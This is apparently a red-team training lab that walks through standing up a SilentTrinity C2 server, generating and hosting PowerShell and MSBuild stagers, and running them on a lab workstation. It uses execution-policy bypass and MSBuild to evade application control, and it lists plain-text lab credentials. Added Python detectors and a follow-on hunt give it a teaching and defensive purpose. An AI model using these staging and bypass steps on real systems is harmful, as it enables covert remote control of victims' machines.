L1130-Red - SilentTrinity Stagers Attack

Lab Overview

In this lab, the student will stand up a C2 framework, create a listener for two malware implants, generate stagers, and detonate the payloads. The malware will leave a trail of IoCs that are discoverable in Elastic.

Initiate a Command and Control framework. Create malware and launch the Command and Control malware session on the Windows 10 workstation. Hunt for Indicators of Compromise.

Attack Step One

Linux - SSH Session 1 (Team Server)

To begin this lab, you will first connect to the Member Server (WS01). Then, you will connect to the Linux server at 10.10.98.20.
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
Upon the first connection to an SSH server, you may get a popup warning to accept the remote server's SSL certificate. Accept the certificate and you will be prompted for credentials as a new window opens. The new window (it will have a black background) is the Putty SSH session. When you close the Putty window, the SSH session is disconnected. During this lab it will be necessary to have multiple SSH sessions open.

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

PowerShell

Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Putty Session

With the PowerShell window open, run the following command, which launches Putty and initiates a connection to the server at 10.10.98.20. The command instructs Putty to open an SSH session to 10.10.98.20 and specifies the "itadmin" username.

putty -ssh itadmin@10.10.98.20

As previously discussed, you may receive an alert regarding the SSH server's SSL certificate. You will then be prompted for credentials. The password for the "itadmin@10.10.98.20" account is:

APTClass2021!

Create Silent Trinity TeamServer

Working now within the Putty session, use the following command to change into the SILENTTRINITY directory, from which the team server will be started as root:

Bash Input

cd /opt/SilentTrinity

Launch the Silent Trinity Team Server

Bash Input

screen -S ST-teamserver
sudo python3.8 st teamserver --port 81 10.10.98.20 APTClass!

Bash Output

Attack Step Two

Linux - SSH Session 2 (Attacker Session)

For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.

Connect to SilentTrinity with Attack Client

SSH to 10.10.98.20 using the PuTTY client installed on the WS01 system. Open a PowerShell and then execute putty using the command line.

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

PowerShell

Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Connecting to the SSH Server

From the PowerShell window, again connect to the Linux server with Putty.

PowerShell Input

putty -ssh itadmin@10.10.98.20

Connecting and Configuring the Silent Trinity Attack Server

We will now use the Bash prompts on the SSH server to create a screen session, followed by connecting to the ST server.

Screen

A screen session keeps the process running even if the SSH connection is closed or dropped.

Bash Input

cd /opt/SilentTrinity

It is the same process to get to this point for both Console Session 1 and Console Session 2 (and the same outcome).

ST Client

Now, connect to the team-server as a client with the following command:

Bash Input

sudo python3.8 st client wss://itadmin:APTClass\!@10.10.98.20:81

You will now be connected to the Silent Trinity C2 server.

Configure Command and Control Server

Once the SilentTrinity client has connected, execute the following commands one at a time.

Silent Trinity Input

listeners
use https
set port 4444
options
start

There is now an HTTPS listener running on TCP port 4444, waiting for connections.

Create Stager Malware

A stager is a small package whose instructions tell the implant to reach back to the command server for the remaining payload (the bits and bytes of the malware stage). No stager has been generated yet, so create one for each delivery method:

Silent Trinity Input

stagers
use powershell
generate https
use msbuild
generate https

Both stagers now reside in the /opt/SilentTrinity/ directory.

Silent Trinity Output

The next step of this lab will open a third SSH session, create a new directory to host the malware stagers, move the stagers and host the malware stagers.

Attack Step Three

Linux - SSH Session 3 (Malware Host)

For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.

Connect to the SSH Server

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

PowerShell

Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Connecting to the SSH Server

From the PowerShell window, again connect to the Linux server with Putty.

PowerShell Input

putty -ssh itadmin@10.10.98.20

Move Malware Stagers

Now that the malware stagers have been generated, let's move them into a new folder.

Bash Input

sudo -s
mkdir /opt/web
mv /opt/SilentTrinity/stager.* /opt/web
cd /opt/web
ls

Host Malware Stagers via HTTP

Next, host the malware with python3’s http.server module.

Bash Input

python3 -m http.server

Bash Output

The malware is now being hosted on the Linux server at http://10.10.98.20:8000 (the module's default port). The next steps of the lab will download and execute the malware on the workstation.
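The python3 http.server module writes one access-log line per request to its terminal (stderr), so the ad-hoc web root that served the stagers also records who fetched them and when. The following is an added example, not part of this lab or of SilentTrinity: a small Python parser for that log format that flags completed downloads of script and project files by client address. The log lines embedded in it are constructed to mirror this step; the workstation address 10.10.98.14 is the one the team server later reports for WS01.

```python
import re
from collections import defaultdict
from datetime import datetime

# Default log line written by `python3 -m http.server`, e.g.
# 10.10.98.14 - - [16/Mar/2020 18:57:01] "GET /stager.ps1 HTTP/1.1" 200 -
LOG_RE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Extensions a defender would not expect an ad-hoc web root to serve to workstations.
RISKY_EXTENSIONS = {".ps1", ".psm1", ".xml", ".csproj", ".hta", ".vbs", ".js", ".exe", ".dll", ".bat"}

# Constructed sample log (not captured from the lab) for the sequence in this step:
# a directory listing, the two stager fetches, a missing favicon and unrelated traffic.
SAMPLE_LOG = """\
10.10.98.14 - - [16/Mar/2020 18:57:01] "GET / HTTP/1.1" 200 -
10.10.98.14 - - [16/Mar/2020 18:57:02] "GET /favicon.ico HTTP/1.1" 404 -
10.10.98.14 - - [16/Mar/2020 18:57:20] "GET /stager.ps1 HTTP/1.1" 200 -
10.10.98.14 - - [16/Mar/2020 18:57:31] "GET /stager.xml HTTP/1.1" 200 -
10.10.98.77 - - [16/Mar/2020 18:58:05] "GET /index.html HTTP/1.1" 200 -
10.10.98.77 - - [16/Mar/2020 18:58:06] "HEAD /stager.xml HTTP/1.1" 200 -
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y %H:%M:%S")
    rec["status"] = int(rec["status"])
    return rec


def find_stager_downloads(lines):
    """Map client address -> [(timestamp, path)] for completed GETs of risky files."""
    findings = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        # Only a successful GET delivers the file body; HEADs and 404s are not downloads.
        if rec is None or rec["method"] != "GET" or rec["status"] != 200:
            continue
        path = rec["path"].split("?", 1)[0]
        ext = path[path.rfind("."):].lower() if "." in path else ""
        if ext in RISKY_EXTENSIONS:
            findings[rec["client"]].append((rec["ts"], path))
    return dict(findings)


if __name__ == "__main__":
    for client, hits in find_stager_downloads(SAMPLE_LOG.splitlines()).items():
        for ts, path in hits:
            print(f"{ts:%Y-%m-%d %H:%M:%S} {client} fetched {path}")
```

On the sample input this reports the two stager fetches from 10.10.98.14 and nothing for the second client. In a real hunt the same parser would be pointed at the captured terminal output of the rogue server, or the pattern would be rewritten as a query over proxy or web-server logs in Elastic.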

Attack Step Four

Malware Stager Procurement

Now that the SilentTrinity framework is running, an attacker client is connected, and the malware has been generated and served, it's time to download the malware and attempt to execute it on the Member Server, WS01.

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

Download Stagers

Open Internet Explorer.

Navigate using Internet Explorer’s address bar to http://10.10.98.20:8000 and download both stagers.

Right (alternate) click both items and choose Save target as... Both items should be saved under the user’s Downloads folder.

A warning may be presented that can be ignored.

After the malware stagers have been downloaded, continue onto the next step of the lab to execute the malware.

Attack Step Five

Malware Artifact Execution

Continuing with the Remote Desktop Session on Member Server WS01, we now will execute the downloaded malware.

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

PowerShell

Launch Windows PowerShell from the Windows Start Menu. See Lab L0250 for instruction on launching PowerShell.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Execution of HTTPS Stager

In PowerShell, run the following command to execute the malware stager for Silent Trinity.

PowerShell Input

Set-ExecutionPolicy bypass -Force
Import-Module .\Downloads\stager.ps1

PowerShell Output

PS C:\Users\itadmin> Set-ExecutionPolicy bypass -Force
PS C:\Users\itadmin> Import-Module .\Downloads\stager.ps1
[*] Found info in embedded resources:
        - GUID: 00000000-0000-0000-0000-000000000000
        - PSK: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
        - URLS: ####BEGIN_URLS_SECTION####loremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsum####END_URLS_SECTION####
[+] URLS: https://10.10.98.20:4444
[*] Attempting HTTP POST to https://10.10.98.20:4444/dfde1d15-fb4e-46d9-8063-94d3c4909c98
[-] Attempt #1
[*] Attempting HTTP GET to https://10.10.98.20:4444/dfde1d15-fb4e-46d9-8063-94d3c4909c98
[-] Attempt #1
[*] Downloaded 569104 bytes
        [-] 'Boo.Lang.Compiler.dll' was required...
        [+] 'Boo.Lang.Compiler.dll' loaded...
        [-] 'Boo.Lang.dll' was required...
        [+] 'Boo.Lang.dll' loaded...

[*] Compiling Stage Code
        [-] 'Boo.Lang.Extensions.dll' was required...
        [+] 'Boo.Lang.Extensions.dll' loaded...
        [-] 'System.dll' was required...
        [+] 'System.dll' loaded...
        [-] 'System.Core.dll' was required...
        [+] 'System.Core.dll' loaded...
        [-] 'System.Web.Extensions.dll' was required...
        [+] 'System.Web.Extensions.dll' loaded...
        [-] 'Boo.Lang.Parser.dll' was required...
        [+] 'Boo.Lang.Parser.dll' loaded...
        [-] 'Microsoft.VisualBasic.Devices.dll' was required...
        [-] 'Microsoft.VisualBasic.dll' was required...
        [+] 'Microsoft.VisualBasic.dll' loaded...
[+] Compilation Successful!
[*] Executing
Jr8d3q6GpM CheckIn

After the malware stager has been executed, continue on to the next phase of the lab.

Execution of MSBuild Stager

In an environment where application control is in effect, the Microsoft-signed MSBuild.exe binary can be useful to an attacker, because a trusted build tool is allowed to run where unsigned code is not. While this lab environment does not restrict application execution in this manner, this lab section will demonstrate the malware stager executed through MSBuild.

Next, in PowerShell, run the following command to execute the stager for Silent Trinity with the trusted MSBuild binary.

PowerShell Input

cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
.\MSBuild.exe c:\Users\itadmin\Downloads\stager.xml

If the above command fails, try:

.\MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml

PowerShell Output

C:\Users\itadmin>
C:\Users\itadmin> cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\

c:\Windows\Microsoft.NET\Framework64\v4.0.30319>MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml
Microsoft (R) Build Engine version 4.8.3752.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

Build started 3/16/2020 6:58:05 PM.
[+] URLS: https://10.10.98.20:4444
[*] Attempting HTTP POST to https://10.10.98.20:4444/521a336b-e199-4bff-a81a-2207f37d79b2
[-] Attempt #1
[*] Attempting HTTP GET to https://10.10.98.20:4444/521a336b-e199-4bff-a81a-2207f37d79b2
[-] Attempt #1
[*] Downloaded 569104 bytes
        [-] 'Boo.Lang.Compiler.dll' was required...
        [+] 'Boo.Lang.Compiler.dll' loaded...
        [-] 'Boo.Lang.dll' was required...
        [+] 'Boo.Lang.dll' loaded...

[*] Compiling Stage Code
        [-] 'Boo.Lang.Extensions.dll' was required...
        [+] 'Boo.Lang.Extensions.dll' loaded...
        [-] 'Boo.Lang.Parser.dll' was required...
        [+] 'Boo.Lang.Parser.dll' loaded...
        [-] 'Microsoft.VisualBasic.Devices.dll' was required...
[+] Compilation Successful!
[*] Executing
z8DiGrOcG3 CheckIn

Having launched the malware stagers from both PowerShell and MSBuild, the next lab steps will check that the command-and-control malware has checked in to the team server.
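Both stager launches leave host telemetry that the hunt in L1130-Blue is meant to surface: the execution-policy change and the module import from the Downloads folder in PowerShell script-block logging, MSBuild.exe started from a shell with a project file under the user's profile, and MSBuild.exe (a build tool) opening an HTTPS connection to the team server on port 4444. The following Python detector is an added example, not part of the lab, of SilentTrinity, or of any Elastic rule set. The event dictionaries are constructed and only loosely modelled on Sysmon Event ID 1 (process create), Event ID 3 (network connect) and PowerShell Event ID 4104 (script block) fields; the rule names are chosen here for illustration.

```python
import re

# Constructed sample telemetry (not captured from the lab), shaped loosely after
# Sysmon Event ID 1 / 3 and PowerShell 4104 fields. Hosts, paths and ports mirror the lab.
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
MSBUILD_FRAMEWORK = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe"
MSBUILD_VS = "C:\\Program Files\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe"
DEVENV = "C:\\Program Files\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe"

SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "WS01", "script_block": "Set-ExecutionPolicy bypass -Force"},
    {"event_id": 4104, "host": "WS01", "script_block": "Import-Module .\\Downloads\\stager.ps1"},
    {"event_id": 3, "host": "WS01", "image": PS_EXE, "dest_ip": "10.10.98.20", "dest_port": 4444},
    {"event_id": 1, "host": "WS01", "image": MSBUILD_FRAMEWORK, "parent_image": PS_EXE,
     "command_line": "MSBuild.exe c:\\Users\\itadmin\\Downloads\\stager.xml"},
    {"event_id": 3, "host": "WS01", "image": MSBUILD_FRAMEWORK, "dest_ip": "10.10.98.20", "dest_port": 4444},
    # Benign noise: a developer build launched by Visual Studio and routine PowerShell use.
    {"event_id": 1, "host": "DEV01", "image": MSBUILD_VS, "parent_image": DEVENV,
     "command_line": "MSBuild.exe C:\\src\\app\\app.csproj /t:Build"},
    {"event_id": 4104, "host": "WS01", "script_block": "Get-Process | Sort-Object CPU -Descending"},
    {"event_id": 3, "host": "WS01", "image": PS_EXE, "dest_ip": "10.10.98.30", "dest_port": 443},
]

USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|desktop|documents|appdata)\\", re.I)
EXEC_POLICY = re.compile(r"set-executionpolicy\s+(-executionpolicy\s+)?(bypass|unrestricted)", re.I)
IMPORT_FROM_DOWNLOADS = re.compile(r"import-module\s+\S*downloads\\", re.I)
SHELL_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_script_block(ev):
    """4104: execution-policy weakening, or loading a module straight from Downloads."""
    text = ev["script_block"]
    if EXEC_POLICY.search(text):
        return "powershell_execution_policy_bypass"
    if IMPORT_FROM_DOWNLOADS.search(text):
        return "powershell_import_module_from_downloads"
    return None


def check_process_create(ev):
    """1: MSBuild.exe building a project from a user-writable path, or launched by a shell."""
    if basename(ev["image"]) != "msbuild.exe":
        return None
    if USER_WRITABLE.search(ev["command_line"]):
        return "msbuild_project_from_user_writable_path"
    if basename(ev["parent_image"]) in SHELL_PARENTS:
        return "msbuild_spawned_from_shell"
    return None


def check_network(ev):
    """3: a build tool talking to the network at all, or PowerShell on an uncommon port."""
    image = basename(ev["image"])
    if image == "msbuild.exe":
        return "msbuild_network_connection"
    if image in ("powershell.exe", "pwsh.exe") and ev["dest_port"] not in (80, 443):
        return "powershell_uncommon_port"
    return None


HANDLERS = {4104: check_script_block, 1: check_process_create, 3: check_network}


def hunt(events):
    """Return (host, rule_name) for every event that trips a rule, in input order."""
    findings = []
    for ev in events:
        handler = HANDLERS.get(ev["event_id"])
        rule = handler(ev) if handler else None
        if rule:
            findings.append((ev["host"], rule))
    return findings


if __name__ == "__main__":
    for host, rule in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Run against the sample, every one of the five WS01 events trips a rule and none of the developer or routine PowerShell events do. The MSBuild network rule is the least noisy of the set, since a build engine has no ordinary reason to open a connection to a peer workstation's TCP port 4444; the PowerShell port rule is the one most in need of tuning against an organisation's real baseline.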

Attack Step Six

Command and Control Sessions

Having configured the team server and built, hosted, and executed the Command and Control malware, the workstation should now have created two command and control sessions to the team server.

Return to the SSH session that was operating the team-server's client (SSH Session Two). Check the team server's client side for client sessions with the following commands:

Silent Trinity Input

sessions
list

Silent Trinity Output

[1] ST (stagers)(msbuild) ≫ sessions
[1] ST (sessions) ≫ list
┌Sessions──────────────────────────────┬─────────────────────────────┬──────────────┬──────────────┐
│ Name                                 │ User                        │ Address      │ Last Checkin │
├──────────────────────────────────────┼─────────────────────────────┼──────────────┼──────────────┤
│ 521a336b-e199-4bff-a81a-2207f37d79b2 │ LABS\itadmin@WS10-01        │ 10.10.98.14  │ 00h 00m 01s  │
├──────────────────────────────────────┼─────────────────────────────┼──────────────┼──────────────┤
│ 162f4b13-6181-4d7f-988f-4da6c43fc307 │ LABS\itadmin@WS10-01        │ 10.10.98.14  │ 00h 00m 00s  │
└──────────────────────────────────────┴─────────────────────────────┴──────────────┴──────────────┘
[1] ST (sessions) ≫

Having built a C2 framework and connected the Member Server into it, let's begin the hunt.

Continue on to L1130-Blue

Lab Complete
